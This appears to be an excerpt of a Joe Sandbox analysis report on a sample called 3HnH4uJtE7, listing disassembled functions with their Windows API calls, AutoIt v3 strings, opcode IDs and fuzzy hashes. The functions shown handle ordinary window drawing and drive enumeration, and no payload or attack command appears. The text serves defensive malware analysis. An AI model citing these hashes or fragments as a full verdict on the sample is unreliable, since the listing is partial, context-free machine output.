                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                    • Instruction ID: 894d6014a41ed6f5b8b824972b495a2900cfe312b22cf8259b05d7bdc605518f
                                                                    • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                    • Instruction Fuzzy Hash: 369176722090E34EDB6D427E957403EFFE95A923A231A079ED4F2CB1C5FE24C564D620
                                                                    Function 00907A4A Relevance: .2, Instructions: 237COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 690b1dc8ca980446072509a38990e47d954621cf7e6fd6413ca9ec63b49648a6
                                                                    • Instruction ID: 7809dbed4cf1475479144a77622f231daaff9d0cf89150fa8e990b3fff2f9825
                                                                    • Opcode Fuzzy Hash: 690b1dc8ca980446072509a38990e47d954621cf7e6fd6413ca9ec63b49648a6
                                                                    • Instruction Fuzzy Hash: 0C613661F087496EEA3499E88895BBFF39DDF81730F100D19E882DB2C1DA55BE428365
                                                                    Function 00907CA7 Relevance: .2, Instructions: 237COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9210601fd4e3e4295fd8baa945192d569b0518e72f07ec974a657771114194b3
                                                                    • Instruction ID: 69c78567bdb2fbd40bd00c8560327e3bf1f13af0da00840dc927335a8a98c2e2
                                                                    • Opcode Fuzzy Hash: 9210601fd4e3e4295fd8baa945192d569b0518e72f07ec974a657771114194b3
                                                                    • Instruction Fuzzy Hash: E7615971F087096EDE385AE88855BBFE39CAF82730F100D59E982DB2D1DA16FD42C255
                                                                    Function 00901706 Relevance: .2, Instructions: 232COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                    • Instruction ID: b4cc6623a777d3776d18d2ca0b1832df52332deff328eb822471304fd61a192f
                                                                    • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                    • Instruction Fuzzy Hash: 8C8185376090A34EDB6D827A857443EFFE55E923A131A479ED4F2CB1C1FE24C658E620
                                                                    Function 00952046 Relevance: .1, Instructions: 72COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8945e522d5600e98cf80aec810fdc7950b8d7c9a632eac8869fab957e69c3c71
                                                                    • Instruction ID: ad99e3284b31fbb06e28d3c583134be1a701b128d1f7111752937f79e3a107fb
                                                                    • Opcode Fuzzy Hash: 8945e522d5600e98cf80aec810fdc7950b8d7c9a632eac8869fab957e69c3c71
                                                                    • Instruction Fuzzy Hash: 5C21A8326216158BD728CF79C91267E73E5E754320F15862EE4A7C77D0DE35A904D740
                                                                    Function 00962ADE Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • DeleteObject.GDI32(00000000), ref: 00962B30
                                                                    • DeleteObject.GDI32(00000000), ref: 00962B43
                                                                    • DestroyWindow.USER32 ref: 00962B52
                                                                    • GetDesktopWindow.USER32 ref: 00962B6D
                                                                    • GetWindowRect.USER32(00000000), ref: 00962B74
                                                                    • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00962CA3
                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00962CB1
                                                                    • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00962CF8
                                                                    • GetClientRect.USER32(00000000,?), ref: 00962D04
                                                                    • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00962D40
                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00962D62
                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00962D75
                                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00962D80
                                                                    • GlobalLock.KERNEL32(00000000), ref: 00962D89
                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00962D98
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00962DA1
                                                                    • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00962DA8
                                                                    • GlobalFree.KERNEL32(00000000), ref: 00962DB3
                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00962DC5
                                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,0097FC38,00000000), ref: 00962DDB
                                                                    • GlobalFree.KERNEL32(00000000), ref: 00962DEB
                                                                    • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00962E11
                                                                    • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00962E30
                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00962E52
                                                                    • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0096303F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                    • String ID: $AutoIt v3$DISPLAY$static
                                                                    • API String ID: 2211948467-2373415609
                                                                    • Opcode ID: 9500cdacdcd28e8c1619db602ddb6372b86007d6f8f52a6f16dfc2f07dcfb152
                                                                    • Instruction ID: 09c3e7fbf53c1db45e2c07387f5ed62b3ef6950428cd30aaf7d459ec6b821b94
                                                                    • Opcode Fuzzy Hash: 9500cdacdcd28e8c1619db602ddb6372b86007d6f8f52a6f16dfc2f07dcfb152
                                                                    • Instruction Fuzzy Hash: 5C027DB2610205EFDB14DF64CD89EAE7BB9FB49710F048158F919AB2A1DB34ED40DB60
                                                                    Function 009770D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetTextColor.GDI32(?,00000000), ref: 0097712F
                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00977160
                                                                    • GetSysColor.USER32(0000000F), ref: 0097716C
                                                                    • SetBkColor.GDI32(?,000000FF), ref: 00977186
                                                                    • SelectObject.GDI32(?,?), ref: 00977195
                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 009771C0
                                                                    • GetSysColor.USER32(00000010), ref: 009771C8
                                                                    • CreateSolidBrush.GDI32(00000000), ref: 009771CF
                                                                    • FrameRect.USER32(?,?,00000000), ref: 009771DE
                                                                    • DeleteObject.GDI32(00000000), ref: 009771E5
                                                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 00977230
                                                                    • FillRect.USER32(?,?,?), ref: 00977262
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00977284
                                                                      • Part of subcall function 009773E8: GetSysColor.USER32(00000012), ref: 00977421
                                                                      • Part of subcall function 009773E8: SetTextColor.GDI32(?,?), ref: 00977425
                                                                      • Part of subcall function 009773E8: GetSysColorBrush.USER32(0000000F), ref: 0097743B
                                                                      • Part of subcall function 009773E8: GetSysColor.USER32(0000000F), ref: 00977446
                                                                      • Part of subcall function 009773E8: GetSysColor.USER32(00000011), ref: 00977463
                                                                      • Part of subcall function 009773E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00977471
                                                                      • Part of subcall function 009773E8: SelectObject.GDI32(?,00000000), ref: 00977482
                                                                      • Part of subcall function 009773E8: SetBkColor.GDI32(?,00000000), ref: 0097748B
                                                                      • Part of subcall function 009773E8: SelectObject.GDI32(?,?), ref: 00977498
                                                                      • Part of subcall function 009773E8: InflateRect.USER32(?,000000FF,000000FF), ref: 009774B7
                                                                      • Part of subcall function 009773E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 009774CE
                                                                      • Part of subcall function 009773E8: GetWindowLongW.USER32(00000000,000000F0), ref: 009774DB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                    • String ID:
                                                                    • API String ID: 4124339563-0
                                                                    • Opcode ID: 047db9d496385ab57e873176f69eb21005c117d36a248bd281b026dc6654188e
                                                                    • Instruction ID: 7fbee90d0adae358e43c66eccaa4323688a77bdb3516368b07b4a846cfa2256e
                                                                    • Opcode Fuzzy Hash: 047db9d496385ab57e873176f69eb21005c117d36a248bd281b026dc6654188e
                                                                    • Instruction Fuzzy Hash: 2AA1B2B311C301AFD7009F60DC48A6BBBA9FF49321F104A1DF96A961E1D735E984DB51
                                                                    Function 008F8D85 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • DestroyWindow.USER32(?,?), ref: 008F8E14
                                                                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 00936AC5
                                                                    • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00936AFE
                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00936F43
                                                                      • Part of subcall function 008F8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,008F8BE8,?,00000000,?,?,?,?,008F8BBA,00000000,?), ref: 008F8FC5
                                                                    • SendMessageW.USER32(?,00001053), ref: 00936F7F
                                                                    • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00936F96
                                                                    • ImageList_Destroy.COMCTL32(00000000,?), ref: 00936FAC
                                                                    • ImageList_Destroy.COMCTL32(00000000,?), ref: 00936FB7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                    • String ID: 0
                                                                    • API String ID: 2760611726-4108050209
                                                                    • Opcode ID: 707cbdb4247b2ebdadb2e490ad3cd5eb83c7ab63e75b7c66c83de32e89501ed9
                                                                    • Instruction ID: 4693afc5f38a6d3c56cb042bdaf3a54ea8522481b3309862b3a4ee09977e7d75
                                                                    • Opcode Fuzzy Hash: 707cbdb4247b2ebdadb2e490ad3cd5eb83c7ab63e75b7c66c83de32e89501ed9
                                                                    • Instruction Fuzzy Hash: C912CA31208245EFDB25CF28D994BBABBF9FB44310F548529F589CB261CB31A891DF91
                                                                    Function 00962711 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • DestroyWindow.USER32(00000000), ref: 0096273E
                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0096286A
                                                                    • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 009628A9
                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 009628B9
                                                                    • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00962900
                                                                    • GetClientRect.USER32(00000000,?), ref: 0096290C
                                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00962955
                                                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00962964
                                                                    • GetStockObject.GDI32(00000011), ref: 00962974
                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00962978
                                                                    • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00962988
                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00962991
                                                                    • DeleteDC.GDI32(00000000), ref: 0096299A
                                                                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 009629C6
                                                                    • SendMessageW.USER32(00000030,00000000,00000001), ref: 009629DD
                                                                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00962A1D
                                                                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00962A31
                                                                    • SendMessageW.USER32(00000404,00000001,00000000), ref: 00962A42
                                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00962A77
                                                                    • GetStockObject.GDI32(00000011), ref: 00962A82
                                                                    • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00962A8D
                                                                    • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00962A97
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                    • API String ID: 2910397461-517079104
                                                                    • Opcode ID: 1811478c2344cb3871b3051033a91c8cc8af60ece5434984d0e9f2d5ec64b007
                                                                    • Instruction ID: 1ecb5c8e5d7fa4fdfb82a6d167e185347ea7558916943651a2e3247c88b34db4
                                                                    • Opcode Fuzzy Hash: 1811478c2344cb3871b3051033a91c8cc8af60ece5434984d0e9f2d5ec64b007
                                                                    • Instruction Fuzzy Hash: 6FB16DB2A10615AFEB14DF68DD89FAE7BB9FB49710F108118F915E7290D770AD40CBA0
                                                                    Function 00954ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetErrorMode.KERNEL32(00000001), ref: 00954AED
                                                                    • GetDriveTypeW.KERNEL32(?,0097CB68,?,\\.\,0097CC08), ref: 00954BCA
                                                                    • SetErrorMode.KERNEL32(00000000,0097CB68,?,\\.\,0097CC08), ref: 00954D36
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorMode$DriveType
                                                                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                    • API String ID: 2907320926-4222207086
                                                                    • Opcode ID: a66f8f71c99c7c4cc5966d996fb8172fdd938eb7de73cde6aab4ab427391b6ad
                                                                    • Instruction ID: 204e3f8e6ef38387dbed9f088b8bf57ba302712d44fe1c084d5ae10e089c6d83
                                                                    • Opcode Fuzzy Hash: a66f8f71c99c7c4cc5966d996fb8172fdd938eb7de73cde6aab4ab427391b6ad
                                                                    • Instruction Fuzzy Hash: 1A61D530605205ABCB54DF2AC981DAC77B4EBC634EB288415FC46EB291DB35EDC9DB81
                                                                    Function 009773E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetSysColor.USER32(00000012), ref: 00977421
                                                                    • SetTextColor.GDI32(?,?), ref: 00977425
                                                                    • GetSysColorBrush.USER32(0000000F), ref: 0097743B
                                                                    • GetSysColor.USER32(0000000F), ref: 00977446
                                                                    • CreateSolidBrush.GDI32(?), ref: 0097744B
                                                                    • GetSysColor.USER32(00000011), ref: 00977463
                                                                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00977471
                                                                    • SelectObject.GDI32(?,00000000), ref: 00977482
                                                                    • SetBkColor.GDI32(?,00000000), ref: 0097748B
                                                                    • SelectObject.GDI32(?,?), ref: 00977498
                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 009774B7
                                                                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 009774CE
                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 009774DB
                                                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0097752A
                                                                    • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00977554
                                                                    • InflateRect.USER32(?,000000FD,000000FD), ref: 00977572
                                                                    • DrawFocusRect.USER32(?,?), ref: 0097757D
                                                                    • GetSysColor.USER32(00000011), ref: 0097758E
                                                                    • SetTextColor.GDI32(?,00000000), ref: 00977596
                                                                    • DrawTextW.USER32(?,009770F5,000000FF,?,00000000), ref: 009775A8
                                                                    • SelectObject.GDI32(?,?), ref: 009775BF
                                                                    • DeleteObject.GDI32(?), ref: 009775CA
                                                                    • SelectObject.GDI32(?,?), ref: 009775D0
                                                                    • DeleteObject.GDI32(?), ref: 009775D5
                                                                    • SetTextColor.GDI32(?,?), ref: 009775DB
                                                                    • SetBkColor.GDI32(?,?), ref: 009775E5
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                    • String ID:
                                                                    • API String ID: 1996641542-0
                                                                    • Opcode ID: 6c0f51e76015847eaf744776c4f09aa41b6b6747d0990a422256b066cd6c92e7
                                                                    • Instruction ID: 85ab2c2a4837e12d7e9ba3b448dd95d679a9328868464cd18542de8c308dcb5c
                                                                    • Opcode Fuzzy Hash: 6c0f51e76015847eaf744776c4f09aa41b6b6747d0990a422256b066cd6c92e7
                                                                    • Instruction Fuzzy Hash: 3B6153B3908218AFDF019FA4DC49AAEBF79EF08320F114525F919A72A1D7759980DF90
                                                                    Function 00970FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetCursorPos.USER32(?), ref: 00971128
                                                                    • GetDesktopWindow.USER32 ref: 0097113D
                                                                    • GetWindowRect.USER32(00000000), ref: 00971144
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00971199
                                                                    • DestroyWindow.USER32(?), ref: 009711B9
                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 009711ED
                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0097120B
                                                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0097121D
                                                                    • SendMessageW.USER32(00000000,00000421,?,?), ref: 00971232
                                                                    • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00971245
                                                                    • IsWindowVisible.USER32(00000000), ref: 009712A1
                                                                    • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 009712BC
                                                                    • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 009712D0
                                                                    • GetWindowRect.USER32(00000000,?), ref: 009712E8
                                                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 0097130E
                                                                    • GetMonitorInfoW.USER32(00000000,?), ref: 00971328
                                                                    • CopyRect.USER32(?,?), ref: 0097133F
                                                                    • SendMessageW.USER32(00000000,00000412,00000000), ref: 009713AA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
